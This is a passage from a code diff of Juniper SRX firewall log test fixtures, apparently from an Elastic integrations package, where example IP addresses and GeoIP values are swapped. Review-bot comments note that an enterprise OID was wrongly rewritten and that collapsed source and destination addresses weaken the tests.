protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] +<14>1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@67.43.156.15 source-address="10.0.0.26" source-port="37233" destination-address="67.43.156.13" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@67.43.156.15 reason="TCP CLIENT RST" source-address="67.43.156.14" source-port="48873" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="48873" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address="10.1.1.100" source-port="58943" destination-address="67.43.156.14" destination-port="80" service-name="junos-http" application="UNKNOWN" 
nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="6018" nat-destination-address="67.43.156.14" nat-destination-port="80" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="16118" packets-from-client="42" bytes-from-client="2322" packets-from-server="34" bytes-from-server="2132" elapsed-time="60" username="N/A" roles="N/A" encrypted="No" destination-interface-name="ge-0/0/0.0" category="N/A" sub-category="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="idle Timeout" source-address="10.1.1.100" source-port="64720" destination-address="67.43.156.15" destination-port="8883" connection-tag="0" service-name="None" nat-source-address="172.19.34.100" nat-source-port="24519" nat-destination-address="67.43.156.15" nat-destination-port="8883" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="3851" packets-from-client="161" bytes-from-client="9530" packets-from-server="96" bytes-from-server="9670" elapsed-time="23755" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" secure-web-proxy-session-type="NA" peer-session-id="0" peer-source-address="0.0.0.0" peer-source-port="0" peer-destination-address="0.0.0.0" peer-destination-port="0" hostname="NA NA" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="10.1.1.100" source-port="49583" 
destination-address="67.43.156.15" destination-port="53" connection-tag="0" service-name="junos-dns-udp" nat-source-address="172.19.34.100" nat-source-port="30838" nat-destination-address="67.43.156.15" nat-destination-port="53" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15399" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason="Closed by junos-alg" source-address="10.1.1.100" source-port="63381" destination-address="67.43.156.15" destination-port="53" service-name="junos-dns-udp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="26764" nat-destination-address="67.43.156.15" nat-destination-port="53" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15361" packets-from-client="1" bytes-from-client="66" packets-from-server="1" bytes-from-server="82" elapsed-time="3" username="N/A" roles="N/A" encrypted="No" profile-name="N/A" rule-name="N/A" routing-instance="default" destination-interface-name="ge-0/0/0.0" uplink-incoming-interface-name="N/A" uplink-tx-bytes="0" uplink-rx-bytes="0" category="N/A" sub-category="N/A" apbr-policy-name="N/A" multipath-rule-name="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] 
diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log-expected.json b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log-expected.json
index 6624647e57f..9d6243d438d 100644
--- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log-expected.json
+++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log-expected.json
@@ -6,7 +6,7 @@
 "port": 10400
 },
 "port": 10400,
- "ip": "175.16.199.1"
+ "ip": "67.43.156.13"
 },
 "log": {
 "level": "informational"
@@ -14,25 +14,22 @@
 "destination": {
 "nat": {
 "port": 10400,
- "ip": "216.160.83.57"
+ "ip": "67.43.156.13"
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-22",
- "city_name": "Changchun",
- "country_iso_code": "CN",
- "country_name": "China",
- "region_name": "Jilin Sheng",
+ "country_name": "Bhutan",
 "location": {
- "lon": 125.3228,
- "lat": 43.88
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 209
+ "number": 35908
 },
 "port": 10400,
- "ip": "175.16.199.1"
+ "ip": "67.43.156.13"
 },
 "rule": {
 "name": "vpn_trust_permit-all"
@@ -40,25 +37,10 @@
 "source": {
 "nat": {
 "port": 594,
- "ip": "175.16.199.1"
- },
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-WA",
- "city_name": "Milton",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Washington",
- "location": {
- "lon": -122.3149,
- "lat": 47.2513
- }
- },
- "as": {
- "number": 209
+ "ip": "10.0.0.1"
 },
 "port": 594,
- "ip": "216.160.83.57"
+ "ip": "10.0.0.1"
 },
 "juniper": {
 "srx": {
@@ -97,8 +79,8 @@
 },
 "related": {
 "ip": [
- "216.160.83.57",
- "175.16.199.1"
+ "10.0.0.1",
+ "67.43.156.13"
 ]
 },
 "client": {
@@ -106,12 +88,12 @@ "port": 594 }, "port": 594, - "ip": "216.160.83.57" + "ip": "10.0.0.1" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715367264Z", - "original": "\u003c14\u003e1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address=\"216.160.83.57\" source-port=\"594\" destination-address=\"175.16.199.1\" destination-port=\"10400\" connection-tag=\"0\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"594\" nat-destination-address=\"216.160.83.57\" nat-destination-port=\"10400\" nat-connection-tag=\"0\" src-nat-rule-type=\"N/A\" src-nat-rule-name=\"N/A\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"1\" policy-name=\"vpn_trust_permit-all\" source-zone-name=\"vpn\" destination-zone-name=\"trust\" session-id-32=\"6093\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"st0.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025343900Z", + "original": "\u003c14\u003e1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"10.0.0.1\" source-port=\"594\" destination-address=\"67.43.156.13\" destination-port=\"10400\" connection-tag=\"0\" service-name=\"icmp\" nat-source-address=\"10.0.0.1\" nat-source-port=\"594\" nat-destination-address=\"67.43.156.13\" nat-destination-port=\"10400\" nat-connection-tag=\"0\" src-nat-rule-type=\"N/A\" src-nat-rule-name=\"N/A\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"1\" policy-name=\"vpn_trust_permit-all\" source-zone-name=\"vpn\" destination-zone-name=\"trust\" session-id-32=\"6093\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"st0.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" 
application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_started", @@ -129,7 +111,7 @@ { "server": { "port": 161, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "informational" @@ -137,40 +119,25 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 161, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "rule": { "name": "MgmtAccess-trust-cleanup" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 37233, - "ip": "216.160.83.57" + "ip": "10.0.0.26" }, "juniper": { "srx": { 
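Review bot: The rewritten `event.original` in this hunk now reads `[junos@67.43.156.15 ...` where the old fixture had `[junos@2636.1.1.1.2.134 ...`; the suffix of the syslog structured-data ID is Juniper's enterprise OID, not an IP address, so the blanket dotted-quad replacement appears to have rewritten a token that is not a test IP at all, and the fixture no longer resembles what an SRX emits. If the pipeline's grok pattern captures or matches on that SD-ID, the expected output was regenerated against an input shape no device produces. The same substitution is visible in every other `original` in this file (hunks @@ -210, @@ -316, @@ -453, @@ -577, @@ -704, @@ -842, @@ -985) and in the added raw log lines of the input file above. Suggest restoring the OID, e.g. `[junos@2636.1.1.1.2.134 source-address=\"10.0.0.1\" ...`, and regenerating the expected file so only the address fields change.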
@@ -210,18 +177,18 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "10.0.0.26", + "67.43.156.13" ] }, "client": { "port": 37233, - "ip": "216.160.83.57" + "ip": "10.0.0.26" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715388484Z", - "original": "\u003c14\u003e1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.134 source-address=\"216.160.83.57\" source-port=\"37233\" destination-address=\"175.16.199.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025354900Z", + "original": "\u003c14\u003e1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"67.43.156.13\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_deny", @@ -238,7 +205,7 @@ { "server": { "port": 2003, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" 
@@ -246,40 +213,37 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 2003, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "rule": { "name": "log-all-else" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 56639, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "juniper": { "srx": { 
@@ -316,18 +280,17 @@
 },
 "related": {
 "ip": [
- "216.160.83.57",
- "175.16.199.1"
+ "67.43.156.15"
 ]
 },
 "client": {
 "port": 56639,
- "ip": "216.160.83.57"
+ "ip": "67.43.156.15"
 },
 "event": {
 "severity": 14,
- "ingested": "2021-11-25T09:37:16.715393644Z",
- "original": "\u003c14\u003e1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.39 source-address=\"216.160.83.57\" source-port=\"56639\" destination-address=\"175.16.199.1\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"]",
+ "ingested": "2021-12-10T10:15:58.025360300Z",
+ "original": "\u003c14\u003e1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address=\"67.43.156.15\" source-port=\"56639\" destination-address=\"67.43.156.15\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"]",
 "kind": "event",
 "action": "flow_deny",
 "category": [
@@ -348,7 +311,7 @@
 "port": 902,
 "bytes": 0,
 "packets": 0,
- "ip": "175.16.199.1"
+ "ip": "67.43.156.15"
 },
 "log": {
 "level": "informational"
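Review bot: In this hunk the new `event.original` uses `67.43.156.15` for source-address, destination-address and the reporting device alike, so `related.ip` shrinks from two entries to one and the expected document can no longer catch a swapped source/destination mapping in the pipeline. The same loss of discrimination recurs in @@ -356, @@ -381, @@ -441 and @@ -453 (source, destination, nat-source and nat-destination are all `67.43.156.15`), in @@ -481 through @@ -577 (`67.43.156.14` in every address field), and for the NAT pair in @@ -1016/@@ -1026 (`172.16.1.19` for both `destination.ip` and `destination.nat.ip`). Since `67.43.156.13`, `.14` and `.15` are all in use elsewhere in this file, giving each role a distinct address, e.g. `source-address=\"67.43.156.14\" ... destination-address=\"67.43.156.15\"`, and regenerating would keep the assertions meaningful without leaving the supported range.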
@@ -356,24 +319,24 @@ "destination": { "nat": { "port": 902, - "ip": "5.6.7.8" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 902, "bytes": 0, - "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 0 }, "rule": { "name": "mngmt-to-vcenter" @@ -381,26 +344,23 @@ "source": { "nat": { "port": 63456, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 63456, "bytes": 94, - "ip": "216.160.83.57", + "ip": "67.43.156.15", "packets": 1 }, "juniper": { @@ -441,9 +401,7 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "5.6.7.8" + "67.43.156.15" ] }, "client": { 
@@ -453,13 +411,13 @@ "port": 63456, "bytes": 94, "packets": 1, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715397812Z", - "original": "\u003c14\u003e1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.39 reason=\"unset\" source-address=\"216.160.83.57\" source-port=\"63456\" destination-address=\"175.16.199.1\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"175.16.199.1\" nat-source-port=\"63456\" nat-destination-address=\"5.6.7.8\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"]", + "ingested": "2021-12-10T10:15:58.025364900Z", + "original": "\u003c14\u003e1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"unset\" source-address=\"67.43.156.15\" source-port=\"63456\" destination-address=\"67.43.156.15\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"67.43.156.15\" nat-source-port=\"63456\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"]", "kind": "event", "start": 
"2014-05-01T08:28:10.933Z", "action": "flow_close", @@ -481,7 +439,7 @@ "port": 768 }, "port": 768, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -489,22 +447,22 @@ "destination": { "nat": { "port": 768, - "ip": "30.0.0.100" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 768, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "rule": { "name": "alg-policy" @@ -512,25 +470,22 @@ "source": { "nat": { "port": 24065, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 24065, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -567,9 +522,7 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "30.0.0.100" + "67.43.156.14" ] }, "client": { 
@@ -577,12 +530,12 @@ "port": 24065 }, "port": 24065, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715401719Z", - "original": "\u003c14\u003e1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.35 source-address=\"216.160.83.57\" source-port=\"24065\" destination-address=\"175.16.199.1\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"24065\" nat-destination-address=\"30.0.0.100\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:15:58.025370800Z", + "original": "\u003c14\u003e1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"24065\" destination-address=\"67.43.156.14\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"24065\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", "kind": "event", "action": "flow_started", "category": [ @@ -602,7 +555,7 @@ "port": 46384 }, "port": 46384, - "ip": "175.16.199.1" + "ip": "192.168.100.12" }, "log": { "level": "informational" 
@@ -610,28 +563,22 @@ "destination": { "nat": { "port": 46384, - "ip": "18.51.100.12" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 3, - "organization": { - "name": "Massachusetts Institute of Technology" - } + "number": 35908 }, "port": 46384, - "ip": "175.16.199.1" + "ip": "192.168.100.12" }, "rule": { "name": "policy1" @@ -639,25 +586,10 @@ "source": { "nat": { "port": 1, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "192.168.2.1" }, "port": 1, - "ip": "216.160.83.57" + "ip": "192.168.2.1" }, "juniper": { "srx": { @@ -694,9 +626,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "18.51.100.12" + "192.168.2.1", + "192.168.100.12", + "67.43.156.14" ] }, "client": { 
@@ -704,12 +636,12 @@ "port": 1 }, "port": 1, - "ip": "216.160.83.57" + "ip": "192.168.2.1" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715405386Z", - "original": "\u003c14\u003e1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2626.192.0.2.1.40 source-address=\"216.160.83.57\" source-port=\"1\" destination-address=\"175.16.199.1\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"1\" nat-destination-address=\"18.51.100.12\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packet-incoming-interface=\"ge-0/0/1.0\"]", + "ingested": "2021-12-10T10:15:58.025378900Z", + "original": "\u003c14\u003e1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"192.168.2.1\" source-port=\"1\" destination-address=\"192.168.100.12\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.168.2.1\" nat-source-port=\"1\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packet-incoming-interface=\"ge-0/0/1.0\"]", "kind": "event", "action": "flow_started", "category": [ @@ -731,7 +663,7 @@ "port": 46384, "bytes": 84, "packets": 1, - "ip": "175.16.199.1" + "ip": "192.168.100.12" }, "log": { "level": "informational" 
@@ -739,29 +671,23 @@ "destination": { "nat": { "port": 46384, - "ip": "18.51.100.12" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 3, - "organization": { - "name": "Massachusetts Institute of Technology" - } + "number": 35908 }, "port": 46384, "bytes": 84, - "ip": "175.16.199.1", + "ip": "192.168.100.12", "packets": 1 }, "rule": { @@ -770,27 +696,12 @@ "source": { "nat": { "port": 1, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "192.168.2.1" }, "port": 1, "bytes": 84, - "ip": "216.160.83.57", - "packets": 1 + "packets": 1, + "ip": "192.168.2.1" }, "juniper": { "srx": { @@ -830,9 +741,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "18.51.100.12" + "192.168.2.1", + "192.168.100.12", + "67.43.156.14" ] }, "client": { 
@@ -842,13 +753,13 @@ "port": 1, "bytes": 84, "packets": 1, - "ip": "216.160.83.57" + "ip": "192.168.2.1" }, "event": { "duration": 0, "severity": 14, - "ingested": "2021-11-25T09:37:16.715409794Z", - "original": "\u003c14\u003e1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2626.192.0.2.1.40 reason=\"response received\" source-address=\"216.160.83.57\" source-port=\"1\" destination-address=\"175.16.199.1\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"1\" nat-destination-address=\"18.51.100.12\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packets-from-client=\"1\" bytes-from-client=\"84\" packets-from-server=\"1\" bytes-from-server=\"84\" elapsed-time=\"0\" packet-incoming-interface=\"ge-0/0/1.0\"]", + "ingested": "2021-12-10T10:15:58.025386900Z", + "original": "\u003c14\u003e1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"response received\" source-address=\"192.168.2.1\" source-port=\"1\" destination-address=\"192.168.100.12\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.168.2.1\" nat-source-port=\"1\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" 